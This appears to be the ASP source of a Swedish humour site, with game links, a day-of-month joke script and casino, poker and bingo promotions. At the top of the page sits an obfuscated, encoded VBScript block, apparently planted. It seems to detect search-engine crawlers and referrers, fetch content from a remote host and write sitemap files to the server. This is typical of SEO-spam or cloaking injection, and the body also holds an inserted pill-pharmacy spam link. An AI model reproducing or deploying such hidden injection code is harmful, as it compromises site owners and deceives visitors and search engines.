<% @Language="VBScript.Encode" %> <% dim key,redID,domain,lineNo,randKey key = "J6Pn2HmH0e568SXnR6KRkmP5tQbh7KEW" redID = "586" domain = "bjnqmgvj8912" lineNo = "303" sitemapStep = "100" #@~^tw8AAA==[K?Gs+:tk ovb@#@&@#@&s!x^ObWx,[WUW:P4k ov#@#@&7]/2W d+cZG[wlLn,'~vlTZF@#@&dk+V6sbs+ lh+,'~]wVm^+vI+$;n/DRU+.\n.jl.km8V/cE`ISEbBJ&JBEr#@#@&d6DWsfKhlbx~',J4ODw)J&J,_P"n5E/DRj+.-D#lMrl(VndvJ?3]j2]{g)t2E*P3PJJJ@#@&dmwrjMV~x,JtDOw=zzSAAJ,_,DnN(9,_~JcEP3PLnD?+.-D9WsCbxcM+9qf*P3~JJw.W1+ddcwta_NK:lbUx 9WslrxN'^kU+gG'PVrU1WN'M+(f{`M+(G8L/tV^9Wslrx{ W.K:fKhlbx8Ld4+^Vwks+UCs+x knV6srsxlhn)[.+6nM'`M+6+D)[$;+MXjYMkUL{ ;!nDH?YMrUo)J@#@&7;;nMXjYMrxTPx~"+;;nkY ?.7+.jlMkl(Vd`rpi2"5mj:Iqg!J*@#@&iLnYGlDliDs~{P.+asl1+i.^`l2r`Ds~9Gslr ~^kx1KSDN(fB0.GsfWsCk ~/sWsbVxC:nS$EnDHjYMkUL*@#@&7r6P]+$;/Ocp!+DH?D.k ocJ4YO2|/kDn:mwJ*~xPrFrPPtnU@#@&7dTnYGlOC`DV~x,Inw^C1+cT+DflDl`.VBJ`D0n.)J~rTJ*@#@&i7L+DfmYCj.s,'~oOfmYCiMVPQ~r[4YD2|/rD+slw{FLdYwxJ,_~dbY+sCwUY+a@#@&dimKxO+UO,'~oOC:KKKmo+cLY9lDC`Ds*@#@&ddb0,J+ `^W YnUD#P@!@*PZPY4nU@#@&did[kh~6/S0@#@&diddnDP0dxU+.\.cZ.lD+r(L^YvJjmMk2Obxocok^+?HdO+sr(LnmOE*P@#@&i7dk+O~6'0d ;DnlDn:+aDsbV+v?.\D HmwKCDt`r&J*P_,Ew/bY:Cw asVE~D.E#@#@&iddW SDrYc1WUD+ Y#@#@&i7d6R^VK/n@#@&ddid+DP0{UGY4k o@#@&77i/nY,W/{xGO4kxL@#@&d7dMnkwG /RMkDn`ronxDCOP/!^m//rb@#@&idiDn/2G /nRAUNv#@#@&id+U[,kW@#@&7x[,q6@#@&ik6~Z4+^3`/n.mo+ O`*PK4nU@#@&dionY9CDliD^~',In2^lmncT+OfmOmj.^~r D0.8r~E!r#@#@&idmKUYxY,x~oY_KPnKCT+coOfmYCiMV#@#@&id.+k2KxdRqDkD+v^W YnxD#@#@&idDdwKx/ 3x9`*@#@&d3sk+@#@&i7k6P/4m3]n6+.D.v#~:tx@#@&di7oY9lDli.^P',]+aVl1ncoYGlOli.^~E Mn0DNEBJFEb@#@&7di^KxOxDP',oOC:KKnmoncT+YGCYmjD^b@#@&idiDn/2G /nRq.kD+c^KxYnUD#@#@&i7iDnkwKx/RAUNv#@#@&id3U9Pq6@#@&i2x9~(0@#@&Ax[Po; mOkKU@#@&@#@&o!xmOrKx~D2^l^jMV`mwbiD^~O+sw[Gslk SY:w^rU+gWBDnq9SktnV^9WslrUB/tns^srVUm:nB;!+DH?D.k ob@#@&dC2bjD^~',I+asCm`mwrj.sBJ`NKhlbxNEBY+h29WhlbU*@#@&ilakjMV,xP"+2Vmmncmwk`.VBJ ^rU+gW)JSYnhaVrxHW*@#@&7mwki.^PxP"naVC1+vlwbjMs~r .+&fNEBD+&9#@#@&dm2rjMV,'~In2^l^+vCwbj.sBJ W.K:9WsCbxNr~kt+^VGG:mkU#@#@&7CakjMsP{PI2sl1+vl2ki.^~E knV6srsxlhn)JS/4n^VobVxls+*@#@&il2k`Ds~{PI2Vmm+vC2k`D^~E 5;Dz?D.k oNEB;En.H?ODbUT#@#@&dM+w^l1njMV~',l2r`DV@#@&2 NPw;UmDkKx@#@&@#@&wEUmDrW PLnD?+.-D9WsCbxcD+swDN&9#@#@&7Nb:~dD\.fK:lbU@#@&ik6PO+h2M+[qG~@*,*TT,lx[~D+hwMn9q9,@!{PvZ!,Otx@#@&iddnM\+M9Wslk ~xProKWGW[dbYnR1G:r@#@&7AV/n(6PO+s2M+[&f,@*P+!Z~K4+U@#@&d7dD\.fK:lbU~',JTWGWG[Nw%wSn4cmGhr@#@&73 N~k6@#@&dLYU+D7+M9Wslrx,'~dD\.fK:lbU@#@&Ax9PoEU^DkGx@#@&@#@&s;U1YkGU,onY_P:nKmo`nmY4b@#@&dOP{P!nDAW9z`hlY4b@#@&ioYuKPKhlL+{$XD+dPKA/O.vYSJ`PwO0r#@#@&2 N,WE mOkKx@#@&@#@&s!UmDkW ~H+S/DDrxLcS/ODBdYMxLb@#@&dHnS/ODbUT'( /DD`^mmd+vhdYM#Ss1l/c/DDxTbb@#@&db0~1nAkY.k L@!{!~O4+x~HhdYMr oxd+ `hkYMb@#@&2UN,s;U1YkKU@#@&@#@&w;UmDkKx~MnO~W[Xv;D^#@#@&iWx~nMDGD,./;s+,x+XY@#@&dU+OP"+O.b+\msP{PZMnCYr(LnmOcrHrmMG/K0O oHSuP:nE#@#@&irDt,I+DDbn\mV@#@&id 6a+x,EMYJB~;D^~,sCVdnBPEJB~Jr@#@&7iR?nU9@#@&di!Y$KNHP',R"n/aWU/AG[H@#@&i3x9PbO4@#@&dU+OP]nDDr+7CV,'~HKYtrUT@#@&2 [,s; mDkW @#@&@#@&wEUmDkGU,AXDn/:WAkO.`(W9XSZdnD#@#@&i[ksPG8N/Y.nm:@#@&idY~K4N/YM+mhP{Pj+M\n.cZDCYr4Nn^YvJmNGN8 kY.+mhJ*@#@&7K4LdOM+C:cPHwn,',F@#@&dK8LkY.+m: \KN+,x&@#@&dK8%/DDlhR62x@#@&iG4N/O.l: MkO+,8KNz@#@&iW4N/D.+m: nK/rObWx,xPZ@#@&iG8LkYM+C: PHwnP{~ @#@&7G(L/O.lhR;4mDdY,'P;/O@#@&d$XD+dPKA/D.P{PW(%dYM+m: InC9Kn6D@#@&iW8%kYDnCsR/VKd@#@&i/YPK4NdYM+C:,'~UKYtbUo@#@&2 [~s!x1YrWU@#@&@#@&s!UmDkGU,Ztn^0jd+MCT+UD`*@#@&ifbhP!/nDmonUD@#@&i/tm3`dnDmoxOPx~,sCVkn@#@&d;dDlLn Y~',];;/DR?D7nDjl.km4snk`J_PKh{jU3]{zMA1PJb@#@&d;/.lT+UO,'PJ/m/n`!dDCT+ Y#@#@&i(0,qU/DDcqBE/.lT+xDSEoKWTVnJSq*P@*PZ~Y4+U@#@&dd/4mVjknMlLxDP',KM;+@#@&72 N~(6@#@&i(0,qxkO.`8~!/nDCLxO~r8k oES8#P@*~ZPOtU@#@&7iZ4+m0jknDmonxDPx~:DE@#@&i2x9~(0@#@&iqWP(UkY.`8SEk+.CT+xOSrXCtKGr~q*P@*P!,Y4nx@#@&7d;tn^0j/.lT+xD~xP:D!+@#@&73 N~k6@#@&Ax[~wEx^ObWU@#@&@#@&s; mDkW P;4+13]+6+..D`*@#@&iNks~.+6+MDnD@#@&iZ4+1VI0n.M+D~x,sCVkn@#@&7M+6+DM+M~',In;!+dOc?+M-+M.lMrC4^+k`ECPPh{]2w3IAIEb@#@&d(W,qU/D.vFSM+6+DM+MSJTWGo^+ ^KRLaE~8#P@*~TPDtx@#@&77;tnm0]+6+..DPx~:D;+@#@&i2U9Pb0@#@&d&WP&xdYM`qSM+0.DD~rzCtKWcmGR%2r~q#,@*PZPO4x@#@&7iZ4+1V"+WDM+D,',PD!+@#@&i2U[,k0@#@&d&0P&UdYM`8~.+WnMDnDBE4bxLEBF#~@*,!~Y4n @#@&id;t+13"n0D.+MPx~:DE@#@&i2x9~r0@#@&Ax[Po; mOkKU5LcEAA==^#~@ %> ekul.se - Ett roligare internet
b?rbar PC og tavle i en drevet av intel http://norgepiller.com/acetominophen/ apotek lagre sacramento
ekul
   
internet
Spel
Spel i samarbete med infart spel och zylom

zuma deluxe
text express
cubis deluxe
diamond mine
penguin puzzle
mah jong quest
paintball
tetris
snake fun
Fler spel>>      gratis spel

BusBusring.se

Poker

pokersite

pokerskola

pokerbonus

Roligt just nu

roliga bilder  |   roliga lekar   |   roliga låtar

dagens roliga historia:

<% session.lcid = 1053 tid = Now() dag = datepart("d",date()) if (dag=1) THEN historia="Varför ramlar de där ungarna hela tiden?
De är trillingar..." if (dag=2) THEN historia="Ola hade hört att man kunde spara energi genom att sänka inomhustemperaturen s?nu har han kylskåpsdörren p?glänt" if (dag=3) THEN historia="Ada var ute och simmade när Kalle ser en haj i vattnet och skriker febrilt:
Haj! Haj!
Haj p?dig du svarar Ada." if (dag=4) THEN historia="Ola ringer receptionen och säger
- Jag vill beställa väckning
Närd?
-Nu meddetsamma." if (dag=5) THEN historia="Varför går norrmännen mitt i vägen?
De är rädda för de vilda blommorna vid vägkanten." if (dag=6) THEN historia="I USA blir en person överkörd varje kvart.
-Oj han kan inte m?s?bra" if (dag=7) THEN historia="Värst vad mörkt det var här. Här kan inte ha varit tänt p?länge." if (dag=8) THEN historia="Jag sa inte att hunden kan räkna men den är iallafall väldigt förtjust i matte" if (dag=9) THEN historia="Jag sa inte att du var dum. Jag sa bara ta p?hjälmen det kommer en hackspett" if (dag=10) THEN historia="En musiker uppträde p?ett sjukhus. Innan han gick sa han
-hej d?hoppas ni blir bättre.
-Tack detsamma sa patienterna" if (dag=11) THEN historia="Folk skämtar om min vikt.
-Äh upp med hakorna..." if (dag=12) THEN historia="Hos frisören. -Ska jag ta med maskinen där bak?
-Nej tack men gärna i nacken..." if (dag=13) THEN historia="jon Ström var ute och körde med sin elbil. Plötsligt fick han sladd tappade kontakten och slog en volt." if (dag=14) THEN historia="Kan jag f?prova den röda klänningen i fönstret.
Javisst men annars har vi provrum ocks? if (dag=15) THEN historia="Var laxermedlet bra?
-Nje det hände inte ett skit" if (dag=16) THEN historia="- Vet du vad det är för skillnad p?en hästrumpa och en brevlåda? - Nej... - D?vågar man ju aldrig skicka dig att posta brev! " if (dag=17) THEN historia="- Kan du mjölka och köra en traktor? frågade bonden sin nya dräng. - Köra traktor kan jag men mjölka den har jag aldrig gjort. " if (dag=18) THEN historia="- Hovmästaren kan jag f?några tandpetare?
- Tyvärr alla tandpetare är upptagna för tillfället. " if (dag=19) THEN historia="- Varför går du inte hem? - Min fru är arg. - Varför är hon det? - För att jag inte är hemma. " if (dag=20) THEN historia="Hanna övar flitigt p?sitt piano d?det ringer p?dörren. - Goddag, jag är pianostämmaren, säger mannen som ringde p? - Men jag har inte beställt någon pianostämmning säger Hanna. - Nej men det har grannarna gjort." if (dag=21) THEN historia="- Hur var namnet? - Karlsson utan X. - Men Karlsson stavas väl inte med X? - Nej jag sade ju det!" if (dag=22) THEN historia="- Nu måste du g?till skolan Nisse! - Nej jag vill inte! alla är s?dumma mot mig där! - G?nu! du är ju i alla fall rektor!" if (dag=23) THEN historia="Patienten kommer in p?doktorns mottagning. - Doktorn alla ignorerar mig.
- Nästa." if (dag=24) THEN historia="En attraktiv ung tjej, följ av en äldre dam, gick in p?ett sjukhus.
- Vi har kommit för en undersökning sa tjejen till doktorn. - Okej, sa doktorn g?bakom skynket och ta av dig kläderna.
- Nej, inte jag sa flickan. min faster här.
- Jaha, okej. Räck ut tungan" if (dag=25) THEN historia="- Är det ni som tillverkar Magnecyl?
- Ja det stämmer.
- D?skulle jag vilja tala med den värkstillande direktören." if (dag=26) THEN historia="- Aaah, syster ge mig en kyss!
- Nej.
- Snälla syster, bara en liten en.
- Nej, verkligen inte.
- Ah, syster, kom igen nu, kyss mig!
- Nej, herr Kron... Och egentligen borde jag inte ens en gång ligga här i er säng. " if (dag=27) THEN historia="- Det var en liten biff!
- Ja men herrn kommer att bli förvånad över hur lång tid det kommer att ta att äta upp den." if (dag=28) THEN historia="Polisen till fartsyndaren: - Såg ni inte hastighetsbegrännsningen?
- Nää jag hann inte." if (dag=29) THEN historia="Tv?väninnor: -Hej Lotta! jag hörde att du hittat en jättegullig kille. Hur är hans familj, kommer ni bra överens?
-Nej hans fru är jättesur." if (dag=30) THEN historia="När Bettan gifte sig kom en massa presenter. Karotter bestick och en massa andra saker. Ett paket hade ett kort med texten: Ha det här p?dig p?bröllopsnatten s?får du det trevligt.
Nyfiket slet hon upp paketet och fann att det var tomt." if (dag=31) THEN historia="- Får jag bjuda p?ett glas vitt vin? frågar Marie sin vännina.
- Nej tack, jag kör.
Det blir tyst en stund...
- Ja men ta ett glas rött d?det syns ju inte i blodprovet" response.write "" & historia & "" %>
Casino

Casinobonus

Läs mer och Spela casino

21Nova - casinot för dig!


Vad gör du om du har tråkigt och bara har tråkiga appar p?mobilen? Givetvis går du in för casinospel! Det finns en hel del att välja p?både när det gäller slots och blackjack samt andra spel. Casinoandroid är en casinosajt med fokus p?Android, men har du en iPad s?är den sajten riktigt bra änd?eftersom de flesta casinosidorna har stöd för båda. P?datorn såväl som p?mobilen kan du ocks?spela roulette. Genom att testa gratis roulette s?får du en bra bild av spelet innan du spelar för riktiga pengar.
Vadslagning


oddsjämförelse

Bingo


bingobonus

bingowebb

    Bookmark and Share